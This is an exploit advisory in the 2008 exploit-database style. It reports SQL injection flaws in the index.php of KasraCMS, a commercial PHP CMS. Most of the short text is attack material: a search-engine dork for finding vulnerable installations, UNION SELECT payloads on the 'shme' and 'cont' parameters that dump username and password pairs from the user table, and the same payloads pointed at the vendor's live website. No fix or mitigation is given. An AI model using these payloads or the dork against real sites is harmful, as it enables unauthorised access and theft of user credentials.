-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= KasraCMS (index.php) Multiple Remote SQL Injection Vulnerabilities -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [~] Script: KasraCMS [~] Language : PHP [~] WebSite: http://kasracms.com [~] affected File: index.php [~] Type : Commercial [~] Report-Date : 25/10/2008 --[ DoRK ]-- intext:"2007-2008 Kasra ICT" --[ Founder ]-- G4N0K --[ Exploit ]-- [~] http://localhost/[path]/index.php?shme=-63 UNION ALL SELECT 0,0,concat(username,0x3a,password),0,0,0,0,0 FROM user-- [~] http://localhost/[path]/index.php?cont=-63 UNION ALL SELECT 0,0,0,concat(username,0x3a,password),0,0,0,0 FROM user-- --[ L!ve ]-- http://kasracms.com/index.php?cont=-63 UNION ALL SELECT 0,0,0,concat(username,0x3a,password),0,0,0,0 FROM user-- http://kasracms.com/index.php?shme=-63 UNION ALL SELECT 0,0,concat(username,0x3a,password),0,0,0,0,0 FROM user-- --[ Greetz ]-- [~] ALLAH [~] Tornado2800 [~] Hussain-X //ALLAH, forgimme... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= EoX -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=